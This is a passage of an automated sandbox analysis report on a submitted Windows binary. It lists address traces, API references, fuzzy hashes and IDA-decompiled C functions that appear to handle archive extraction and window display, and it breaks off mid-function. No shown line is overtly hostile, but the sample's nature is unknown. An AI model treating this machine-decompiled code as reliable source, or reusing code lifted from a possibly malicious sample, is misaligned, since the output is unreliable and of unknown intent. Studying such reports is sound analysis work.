                                                                                                                            0x0040a4d2
                                                                                                                            0x0040a4d8
                                                                                                                            0x0040a4e0
                                                                                                                            0x0040a4e0
                                                                                                                            0x0040a2ec
                                                                                                                            0x0040a4d0
                                                                                                                            0x0040a4d0
                                                                                                                            0x00000000
                                                                                                                            0x0040a4d0
                                                                                                                            0x0040a2f2
                                                                                                                            0x0040a2f5
                                                                                                                            0x0040a2fa
                                                                                                                            0x0040a2ff
                                                                                                                            0x0040a302
                                                                                                                            0x0040a302
                                                                                                                            0x0040a305
                                                                                                                            0x0040a308
                                                                                                                            0x0040a30d
                                                                                                                            0x0040a312
                                                                                                                            0x0040a315
                                                                                                                            0x0040a315
                                                                                                                            0x0040a318
                                                                                                                            0x0040a323
                                                                                                                            0x0040a325
                                                                                                                            0x0040a330
                                                                                                                            0x0040a33a
                                                                                                                            0x0040a33d
                                                                                                                            0x0040a33e
                                                                                                                            0x0040a347
                                                                                                                            0x00000000
                                                                                                                            0x0040a34d
                                                                                                                            0x0040a355
                                                                                                                            0x0040a358
                                                                                                                            0x0040a359
                                                                                                                            0x0040a360
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a36e
                                                                                                                            0x0040a371
                                                                                                                            0x0040a372
                                                                                                                            0x0040a379
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a387
                                                                                                                            0x0040a38a
                                                                                                                            0x0040a38b
                                                                                                                            0x0040a392
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a3a0
                                                                                                                            0x0040a3a3
                                                                                                                            0x0040a3a4
                                                                                                                            0x0040a3ab
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a3b9
                                                                                                                            0x0040a3bc
                                                                                                                            0x0040a3bd
                                                                                                                            0x0040a3c4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a3d0
                                                                                                                            0x0040a3d8
                                                                                                                            0x0040a3db
                                                                                                                            0x0040a3e5
                                                                                                                            0x0040a3f0
                                                                                                                            0x0040a3fd
                                                                                                                            0x0040a3fd
                                                                                                                            0x0040a402
                                                                                                                            0x0040a408
                                                                                                                            0x0040a40e
                                                                                                                            0x0040a411
                                                                                                                            0x0040a414
                                                                                                                            0x0040a41c
                                                                                                                            0x0040a42a
                                                                                                                            0x0040a430
                                                                                                                            0x0040a488
                                                                                                                            0x0040a48f
                                                                                                                            0x0040a491
                                                                                                                            0x0040a491
                                                                                                                            0x0040a493
                                                                                                                            0x0040a49c
                                                                                                                            0x0040a4a0
                                                                                                                            0x0040a4a4
                                                                                                                            0x0040a4ac
                                                                                                                            0x0040a4b8
                                                                                                                            0x0040a432
                                                                                                                            0x0040a435
                                                                                                                            0x0040a43f
                                                                                                                            0x0040a443
                                                                                                                            0x0040a448
                                                                                                                            0x0040a449
                                                                                                                            0x0040a450
                                                                                                                            0x0040a454
                                                                                                                            0x0040a45c
                                                                                                                            0x0040a478
                                                                                                                            0x0040a47d
                                                                                                                            0x0040a430
                                                                                                                            0x0040a4c9
                                                                                                                            0x00000000
                                                                                                                            0x0040a4cf

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 0040A2CD
                                                                                                                              • Part of subcall function 00409DAD: __EH_prolog.LIBCMT ref: 00409DB2
                                                                                                                              • Part of subcall function 00408FCD: __EH_prolog.LIBCMT ref: 00408FD2
                                                                                                                              • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2654054672-0
                                                                                                                            • Opcode ID: 55abee7260f8abe240855f7b25643b941ebcc1b184b95c31af575d9cb9fe0adf
                                                                                                                            • Instruction ID: 9e12673def2b6459cc981bd691141fc0cb4a79b6ab5f4124fe6ffa379ca14ef1
                                                                                                                            • Opcode Fuzzy Hash: 55abee7260f8abe240855f7b25643b941ebcc1b184b95c31af575d9cb9fe0adf
                                                                                                                            • Instruction Fuzzy Hash: 6A618375600205AFCB20EF61C885EAEBBB8EF44308F10447FE545B72D1DAB8AD55CB55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040AFA7 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 86%
                                                                                                                            			E0040AFA7(signed int __ecx) {
				intOrPtr _t66;
				intOrPtr* _t72;
				intOrPtr* _t76;
				void* _t81;
				intOrPtr _t83;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int _t100;
				signed int _t124;
				intOrPtr* _t127;
				void* _t129;

				E00418D80(E00419F32, _t129);
				_t124 = __ecx;
				_push(0x98);
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				_t66 = E004031DD();
				 *((intOrPtr*)(_t129 - 0x10)) = _t66;
				 *(_t129 - 4) = 0;
				if(_t66 == 0) {
					_t127 = 0;
					__eflags = 0;
				} else {
					_t127 = E0040B121(_t66);
				}
				 *(_t129 - 4) =  *(_t129 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t129 - 0x10)) = _t127;
				if(_t127 != 0) {
					 *((intOrPtr*)( *_t127 + 4))(_t127);
				}
				 *(_t129 - 4) = 1;
				 *((intOrPtr*)(_t127 + 0x90)) =  *((intOrPtr*)(_t129 + 0xc));
				E0040368D(_t129 - 0x1c);
				 *(_t129 - 4) = 2;
				E0040368D(_t129 - 0x28);
				_t98 =  *((intOrPtr*)(_t129 + 8));
				 *(_t129 - 4) = 3;
				if( *((intOrPtr*)(_t98 + 0x30)) != 0) {
					L8:
					_t26 = _t127 + 8; // 0x8
					 *((intOrPtr*)( *((intOrPtr*)(_t127 + 8)) + 0xc))(_t26,  *((intOrPtr*)(_t98 + 0x44)));
				} else {
					_t137 =  *((char*)(_t98 + 0x40));
					if( *((char*)(_t98 + 0x40)) != 0) {
						goto L8;
					} else {
						E0040488C( *((intOrPtr*)(_t98 + 0x44)), _t129 - 0x1c, _t137, _t129 - 0x28);
						E0040B290(_t127, _t137, _t129 - 0x1c, _t129 - 0x28); // executed
					}
				}
				 *((intOrPtr*)(_t98 + 0x38)) = _t127;
				 *((intOrPtr*)(_t98 + 0x3c)) = _t127;
				_t72 = E0040A90A(_t124, _t137, _t98); // executed
				_t99 = _t72;
				_t73 =  *((intOrPtr*)(_t127 + 0x8c));
				 *((char*)(_t124 + 0x21)) =  *((intOrPtr*)(_t127 + 0x8c));
				if(_t99 == 0) {
					_t100 = 0;
					__eflags =  *((intOrPtr*)(_t127 + 0x78));
					if( *((intOrPtr*)(_t127 + 0x78)) > 0) {
						do {
							_t73 =  *((intOrPtr*)(_t127 + 0x74));
							__eflags =  *((char*)(_t73 + _t100));
							if( *((char*)(_t73 + _t100)) != 0) {
								_push(E00403632(_t129 - 0x34, _t129 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t127 + 0x68)) + _t100 * 4))));
								 *(_t129 - 4) = 4;
								_t81 = E00403089(_t124 + 0xc);
								 *(_t129 - 4) = 3;
								E00403204(_t81,  *((intOrPtr*)(_t129 - 0x34)));
								_t83 =  *((intOrPtr*)(_t127 + 0x80));
								_t73 =  *((intOrPtr*)(_t83 + 4 + _t100 * 8));
								 *((intOrPtr*)(_t124 + 0x18)) =  *((intOrPtr*)(_t124 + 0x18)) +  *((intOrPtr*)(_t83 + _t100 * 8));
								asm("adc [edi+0x1c], eax");
							}
							_t100 = _t100 + 1;
							__eflags = _t100 -  *((intOrPtr*)(_t127 + 0x78));
						} while (_t100 <  *((intOrPtr*)(_t127 + 0x78)));
					}
					E00403204(E00403204(_t73,  *((intOrPtr*)(_t129 - 0x28))),  *((intOrPtr*)(_t129 - 0x1c)));
					 *(_t129 - 4) =  *(_t129 - 4) | 0xffffffff;
					__eflags = _t127;
					if(_t127 != 0) {
						 *((intOrPtr*)( *_t127 + 8))(_t127);
					}
					_t76 = 0;
					__eflags = 0;
				} else {
					E00403204(E00403204(_t73,  *((intOrPtr*)(_t129 - 0x28))),  *((intOrPtr*)(_t129 - 0x1c)));
					 *(_t129 - 4) =  *(_t129 - 4) | 0xffffffff;
					if(_t127 != 0) {
						 *((intOrPtr*)( *_t127 + 8))(_t127);
					}
					_t76 = _t99;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t129 - 0xc));
				return _t76;
			}














                                                                                                                            0x0040afac
                                                                                                                            0x0040afb7
                                                                                                                            0x0040afbb
                                                                                                                            0x0040afc0
                                                                                                                            0x0040afc3
                                                                                                                            0x0040afc6
                                                                                                                            0x0040afcc
                                                                                                                            0x0040afd1
                                                                                                                            0x0040afd4
                                                                                                                            0x0040afe1
                                                                                                                            0x0040afe1
                                                                                                                            0x0040afd6
                                                                                                                            0x0040afdd
                                                                                                                            0x0040afdd
                                                                                                                            0x0040afe3
                                                                                                                            0x0040afe9
                                                                                                                            0x0040afec
                                                                                                                            0x0040aff1
                                                                                                                            0x0040aff1
                                                                                                                            0x0040affa
                                                                                                                            0x0040b001
                                                                                                                            0x0040b007
                                                                                                                            0x0040b00f
                                                                                                                            0x0040b013
                                                                                                                            0x0040b018
                                                                                                                            0x0040b01b
                                                                                                                            0x0040b023
                                                                                                                            0x0040b04b
                                                                                                                            0x0040b051
                                                                                                                            0x0040b056
                                                                                                                            0x0040b025
                                                                                                                            0x0040b025
                                                                                                                            0x0040b029
                                                                                                                            0x00000000
                                                                                                                            0x0040b02b
                                                                                                                            0x0040b035
                                                                                                                            0x0040b044
                                                                                                                            0x0040b044
                                                                                                                            0x0040b029
                                                                                                                            0x0040b05c
                                                                                                                            0x0040b05f
                                                                                                                            0x0040b062
                                                                                                                            0x0040b067
                                                                                                                            0x0040b069
                                                                                                                            0x0040b071
                                                                                                                            0x0040b074
                                                                                                                            0x0040b09a
                                                                                                                            0x0040b09c
                                                                                                                            0x0040b09f
                                                                                                                            0x0040b0a1
                                                                                                                            0x0040b0a1
                                                                                                                            0x0040b0a4
                                                                                                                            0x0040b0a8
                                                                                                                            0x0040b0bb
                                                                                                                            0x0040b0bf
                                                                                                                            0x0040b0c3
                                                                                                                            0x0040b0cb
                                                                                                                            0x0040b0cf
                                                                                                                            0x0040b0d4
                                                                                                                            0x0040b0de
                                                                                                                            0x0040b0e2
                                                                                                                            0x0040b0e5
                                                                                                                            0x0040b0e5
                                                                                                                            0x0040b0e8
                                                                                                                            0x0040b0e9
                                                                                                                            0x0040b0e9
                                                                                                                            0x0040b0a1
                                                                                                                            0x0040b0f9
                                                                                                                            0x0040b0fe
                                                                                                                            0x0040b103
                                                                                                                            0x0040b106
                                                                                                                            0x0040b10b
                                                                                                                            0x0040b10b
                                                                                                                            0x0040b10e
                                                                                                                            0x0040b10e
                                                                                                                            0x0040b076
                                                                                                                            0x0040b081
                                                                                                                            0x0040b086
                                                                                                                            0x0040b08e
                                                                                                                            0x0040b093
                                                                                                                            0x0040b093
                                                                                                                            0x0040b096
                                                                                                                            0x0040b096
                                                                                                                            0x0040b116
                                                                                                                            0x0040b11e

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 0040AFAC
                                                                                                                              • Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
                                                                                                                              • Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD
                                                                                                                              • Part of subcall function 0040B121: __EH_prolog.LIBCMT ref: 0040B126
                                                                                                                              • Part of subcall function 00403089: __EH_prolog.LIBCMT ref: 0040308E
                                                                                                                              • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$ExceptionThrowfreemalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2423332413-0
                                                                                                                            • Opcode ID: c8c338b597bb87f34b6799d60552420470ea2ee0c89de6097328a63dfc2d9501
                                                                                                                            • Instruction ID: f9ed70e7a4a1b4ee0be54417d9786138a5d8b1a5d5847858de7e9c53087b4eef
                                                                                                                            • Opcode Fuzzy Hash: c8c338b597bb87f34b6799d60552420470ea2ee0c89de6097328a63dfc2d9501
                                                                                                                            • Instruction Fuzzy Hash: AB518371900609DFCB15EFA5C484A9EFBB4FF04314F10856FE565A72D2CB389A45CB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040D191 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 92%
                                                                                                                            			E0040D191(void* __ecx) {
				intOrPtr _t58;
				intOrPtr* _t59;
				void* _t66;
				intOrPtr* _t67;
				void* _t68;
				intOrPtr _t70;
				intOrPtr* _t72;
				void* _t78;
				signed int _t81;
				intOrPtr _t85;
				signed int* _t87;
				signed int _t88;
				intOrPtr* _t95;
				void* _t98;
				intOrPtr* _t99;
				void* _t100;
				void* _t102;

				E00418D80(E0041A350, _t102);
				_push(__ecx);
				_t98 = __ecx;
				_t81 =  *(__ecx + 0x28);
				_t58 =  *((intOrPtr*)(__ecx + 0x2c));
				_t87 =  *(__ecx + 0x20);
				_t95 = (_t81 << 4) +  *((intOrPtr*)(_t58 + 0x58));
				if(_t87 == 0) {
					_t88 = _t81;
				} else {
					_t88 =  *_t87;
				}
				if(_t81 != _t88) {
					 *(_t102 - 0x10) = 2;
				} else {
					 *(_t102 - 0x10) = 0 |  *((intOrPtr*)(_t98 + 0xc)) != 0x00000000;
				}
				if( *((intOrPtr*)(_t102 + 8)) != 0 &&  *(_t102 - 0x10) == 0 && (_t81 >=  *((intOrPtr*)(_t58 + 0xe0)) ||  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xdc)) + _t81)) == 0) &&  *((intOrPtr*)(_t95 + 0xd)) == 0) {
					 *(_t102 - 0x10) = 1;
				}
				 *((intOrPtr*)(_t102 + 8)) = 0;
				_t59 =  *((intOrPtr*)(_t98 + 0x30));
				 *(_t102 - 4) = 0;
				_t78 =  *((intOrPtr*)( *_t59 + 0x14))(_t59, _t81, _t102 + 8,  *(_t102 - 0x10));
				if(_t78 == 0) {
					E004063E5(_t98 + 8,  *((intOrPtr*)(_t102 + 8)));
					 *(_t98 + 0x10) =  *(_t98 + 0x10) | 0xffffffff;
					if( *((char*)(_t98 + 0xd)) != 0 &&  *((char*)(_t95 + 0xe)) != 0 &&  *((char*)(_t95 + 0xd)) == 0) {
						_push(1);
						_pop(0);
					}
					 *((char*)(_t98 + 0xf)) = 0;
					 *((char*)(_t98 + 0xe)) = 1;
					 *((intOrPtr*)(_t98 + 0x18)) =  *_t95;
					 *((intOrPtr*)(_t98 + 0x1c)) =  *((intOrPtr*)(_t95 + 4));
					if( *(_t102 - 0x10) == 0 &&  *((intOrPtr*)(_t102 + 8)) == 0) {
						_t70 =  *((intOrPtr*)(_t98 + 0x2c));
						_t85 =  *((intOrPtr*)(_t98 + 0x28));
						if(_t85 >=  *((intOrPtr*)(_t70 + 0xe0)) ||  *((char*)( *((intOrPtr*)(_t70 + 0xdc)) + _t85)) == 0) {
							if( *((char*)(_t95 + 0xd)) == 0) {
								 *(_t102 - 0x10) = 2;
							}
						}
					}
					_t99 =  *((intOrPtr*)(_t98 + 0x30));
					_t66 =  *((intOrPtr*)( *_t99 + 0x18))(_t99,  *(_t102 - 0x10));
					 *(_t102 - 4) =  *(_t102 - 4) | 0xffffffff;
					_t100 = _t66;
					_t67 =  *((intOrPtr*)(_t102 + 8));
					if(_t67 != 0) {
						 *((intOrPtr*)( *_t67 + 8))(_t67);
					}
					_t68 = _t100;
				} else {
					_t72 =  *((intOrPtr*)(_t102 + 8));
					 *(_t102 - 4) =  *(_t102 - 4) | 0xffffffff;
					if(_t72 != 0) {
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t68 = _t78;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t102 - 0xc));
				return _t68;
			}




















                                                                                                                            0x0040d196
                                                                                                                            0x0040d19b
                                                                                                                            0x0040d19e
                                                                                                                            0x0040d1a3
                                                                                                                            0x0040d1a6
                                                                                                                            0x0040d1a9
                                                                                                                            0x0040d1b1
                                                                                                                            0x0040d1b6
                                                                                                                            0x0040d1bc
                                                                                                                            0x0040d1b8
                                                                                                                            0x0040d1b8
                                                                                                                            0x0040d1b8
                                                                                                                            0x0040d1c0
                                                                                                                            0x0040d1cf
                                                                                                                            0x0040d1c2
                                                                                                                            0x0040d1ca
                                                                                                                            0x0040d1ca
                                                                                                                            0x0040d1d9
                                                                                                                            0x0040d1f8
                                                                                                                            0x0040d1f8
                                                                                                                            0x0040d1ff
                                                                                                                            0x0040d205
                                                                                                                            0x0040d208
                                                                                                                            0x0040d216
                                                                                                                            0x0040d21a
                                                                                                                            0x0040d23a
                                                                                                                            0x0040d23f
                                                                                                                            0x0040d247
                                                                                                                            0x0040d255
                                                                                                                            0x0040d257
                                                                                                                            0x0040d257
                                                                                                                            0x0040d260
                                                                                                                            0x0040d263
                                                                                                                            0x0040d269
                                                                                                                            0x0040d26f
                                                                                                                            0x0040d272
                                                                                                                            0x0040d27a
                                                                                                                            0x0040d27d
                                                                                                                            0x0040d286
                                                                                                                            0x0040d298
                                                                                                                            0x0040d29a
                                                                                                                            0x0040d29a
                                                                                                                            0x0040d298
                                                                                                                            0x0040d286
                                                                                                                            0x0040d2a1
                                                                                                                            0x0040d2aa
                                                                                                                            0x0040d2ad
                                                                                                                            0x0040d2b1
                                                                                                                            0x0040d2b3
                                                                                                                            0x0040d2b8
                                                                                                                            0x0040d2bd
                                                                                                                            0x0040d2bd
                                                                                                                            0x0040d2c0
                                                                                                                            0x0040d21c
                                                                                                                            0x0040d21c
                                                                                                                            0x0040d21f
                                                                                                                            0x0040d225
                                                                                                                            0x0040d22a
                                                                                                                            0x0040d22a
                                                                                                                            0x0040d22d
                                                                                                                            0x0040d22d
                                                                                                                            0x0040d2c8
                                                                                                                            0x0040d2d0

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3519838083-0
                                                                                                                            • Opcode ID: 688431a7679907d68e44e8c85a409a014ac76cdf269a26074d0c41ebe40ab3a9
                                                                                                                            • Instruction ID: 4a5508fcdcfeb9f530550f46dd1ec58a167ca447d216ffc80f9ca1221c3f6995
                                                                                                                            • Opcode Fuzzy Hash: 688431a7679907d68e44e8c85a409a014ac76cdf269a26074d0c41ebe40ab3a9
                                                                                                                            • Instruction Fuzzy Hash: 3B418D70A00345EFDB24CF94C484B6ABBA1BF45310F1486BED496AB691C778ED89CB84
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004024DB Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 90%
                                                                                                                            			E004024DB(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _t50;
				intOrPtr _t81;
				intOrPtr _t104;
				intOrPtr _t105;
				void* _t107;

				_t96 = __edx;
				E00418D80(E004195A9, _t107);
				 *((char*)( *((intOrPtr*)(_t107 + 0x10)))) = 0;
				E004029F9(_t107 - 0xb0, __eflags);
				 *(_t107 - 4) = 0;
				 *((intOrPtr*)(_t107 - 0xb0)) = __ecx;
				E004037D2(_t107 - 0xac, __edx);
				E004037D2(_t107 - 0xa0,  *((intOrPtr*)(_t107 + 8)));
				_push(0xf0);
				_t81 = E004031DD();
				 *((intOrPtr*)(_t107 + 8)) = _t81;
				_t113 = _t81;
				 *(_t107 - 4) = 1;
				if(_t81 == 0) {
					_t50 = 0;
					__eflags = 0;
				} else {
					_t50 = E00402BC1(_t81, _t96, _t113);
				}
				 *(_t107 - 4) = 0;
				 *((intOrPtr*)(_t107 - 0x94)) = _t50;
				E004063E5(_t107 - 0x90, _t50);
				if( *((intOrPtr*)(_t107 + 0xc)) == 0) {
					E004026C1(_t107 - 0xb0, __eflags); // executed
					goto L8;
				} else {
					 *((intOrPtr*)( *((intOrPtr*)(_t107 - 0x94)) + 0xd8)) = 1;
					 *((intOrPtr*)(_t107 + 0xc)) = 0;
					 *(_t107 - 4) = 2;
					_t105 = E00418A80(_t107 + 0xc, E00402957, _t107 - 0xb0);
					if(_t105 == 0) {
						E0040368D(_t107 - 0x18);
						 *(_t107 - 4) = 3;
						E00405FAD(0xce4, _t107 - 0x18);
						E00403204(E0040264D( *((intOrPtr*)(_t107 - 0x94)), _t107 - 0x18, _t107 + 0xc),  *((intOrPtr*)(_t107 - 0x18)));
						 *(_t107 - 4) = 0;
						E00418A40(_t107 + 0xc);
						L8:
						_t104 =  *((intOrPtr*)(_t107 + 0x14));
						E004037D2(_t104, _t107 - 0x24);
						__eflags =  *((intOrPtr*)(_t104 + 4));
						if(__eflags == 0) {
							__eflags =  *((intOrPtr*)(_t107 - 0x94)) + 0xe4;
							E004037D2(_t104,  *((intOrPtr*)(_t107 - 0x94)) + 0xe4);
						}
						_t105 =  *((intOrPtr*)(_t107 - 0x28));
						 *((char*)( *((intOrPtr*)(_t107 + 0x10)))) =  *((intOrPtr*)( *((intOrPtr*)(_t107 - 0x94)) + 0xe0));
					} else {
						E00418A40(_t107 + 0xc);
					}
				}
				 *(_t107 - 4) =  *(_t107 - 4) | 0xffffffff;
				E00402B65(_t107 - 0xb0,  *(_t107 - 4)); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t107 - 0xc));
				return _t105;
			}








                                                                                                                            0x004024db
                                                                                                                            0x004024e0
                                                                                                                            0x004024fd
                                                                                                                            0x004024ff
                                                                                                                            0x0040250b
                                                                                                                            0x0040250e
                                                                                                                            0x00402514
                                                                                                                            0x00402522
                                                                                                                            0x00402527
                                                                                                                            0x00402532
                                                                                                                            0x00402534
                                                                                                                            0x00402537
                                                                                                                            0x00402539
                                                                                                                            0x0040253d
                                                                                                                            0x00402546
                                                                                                                            0x00402546
                                                                                                                            0x0040253f
                                                                                                                            0x0040253f
                                                                                                                            0x0040253f
                                                                                                                            0x0040254f
                                                                                                                            0x00402552
                                                                                                                            0x00402558
                                                                                                                            0x00402560
                                                                                                                            0x004025ec
                                                                                                                            0x00000000
                                                                                                                            0x00402566
                                                                                                                            0x0040256c
                                                                                                                            0x00402576
                                                                                                                            0x00402588
                                                                                                                            0x00402591
                                                                                                                            0x00402595
                                                                                                                            0x004025a7
                                                                                                                            0x004025b4
                                                                                                                            0x004025b8
                                                                                                                            0x004025d3
                                                                                                                            0x004025d9
                                                                                                                            0x004025df
                                                                                                                            0x004025f1
                                                                                                                            0x004025f1
                                                                                                                            0x004025fa
                                                                                                                            0x004025ff
                                                                                                                            0x00402602
                                                                                                                            0x0040260c
                                                                                                                            0x00402612
                                                                                                                            0x00402612
                                                                                                                            0x00402620
                                                                                                                            0x00402629
                                                                                                                            0x00402597
                                                                                                                            0x0040259a
                                                                                                                            0x0040259a
                                                                                                                            0x00402595
                                                                                                                            0x0040262b
                                                                                                                            0x00402635
                                                                                                                            0x00402642
                                                                                                                            0x0040264a

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 004024E0
                                                                                                                              • Part of subcall function 004029F9: __EH_prolog.LIBCMT ref: 004029FE
                                                                                                                              • Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
                                                                                                                              • Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD
                                                                                                                              • Part of subcall function 00402BC1: __EH_prolog.LIBCMT ref: 00402BC6
                                                                                                                              • Part of subcall function 0040264D: SetWindowTextW.USER32(?,00000000), ref: 0040268C
                                                                                                                              • Part of subcall function 0040264D: ShowWindow.USER32(?,00000001,?,00000000,75C182C0,00000000,00000000), ref: 004026A0
                                                                                                                              • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                                                                                                              • Part of subcall function 00418A40: FindCloseChangeNotification.KERNELBASE(00000000,00000000,004025E4,?,00000000,?,00000000,?,?,75C182C0,00000000,00000000), ref: 00418A4A
                                                                                                                              • Part of subcall function 00418A40: GetLastError.KERNEL32(?,75C182C0,00000000,00000000), ref: 00418A54
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$Window$ChangeCloseErrorExceptionFindLastNotificationShowTextThrowfreemalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2108476524-0
                                                                                                                            • Opcode ID: ac195c0b695798d9808fac272235901bdee3c4edab07ab49ca39f86af56bbdc0
                                                                                                                            • Instruction ID: e4ab0e75387cb74cbe1b5fc93c7fe6c9256d258209eed3f76a342f3f4d07c0fd
                                                                                                                            • Opcode Fuzzy Hash: ac195c0b695798d9808fac272235901bdee3c4edab07ab49ca39f86af56bbdc0
                                                                                                                            • Instruction Fuzzy Hash: 3F419D719002589BCB15EF65C995BEDBB74AF04318F0484AFE809B72C2DA785F45CB19
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E520 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 97%
                                                                                                                            			E0040E520() {
				intOrPtr _t46;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr _t51;
				intOrPtr* _t55;
				intOrPtr* _t59;
				void* _t65;
				void* _t75;
				intOrPtr* _t76;
				void* _t78;
				intOrPtr* _t79;
				void* _t81;
				void* _t83;

				E00418D80(E0041A4A3, _t81);
				_t79 =  *((intOrPtr*)(_t81 + 8));
				 *((intOrPtr*)(_t81 - 0x10)) = _t83 - 0x88;
				 *((intOrPtr*)(_t81 - 4)) = 0;
				 *((intOrPtr*)( *_t79 + 0x10))(_t79, _t75, _t78, _t65);
				_t76 =  *((intOrPtr*)(_t81 + 0x14));
				 *((char*)(_t81 - 4)) = 1;
				_t86 = _t76;
				 *((intOrPtr*)(_t81 - 0x14)) = _t76;
				if(_t76 != 0) {
					 *((intOrPtr*)( *_t76 + 4))(_t76);
				}
				 *((intOrPtr*)(_t81 - 0x94)) = 0;
				 *((intOrPtr*)(_t81 - 0x90)) = 0;
				 *((char*)(_t81 - 0x1c)) = 1;
				_push( *((intOrPtr*)(_t81 + 0x10)));
				 *((char*)(_t81 - 4)) = 3;
				 *((char*)(_t79 + 0x178)) = 0;
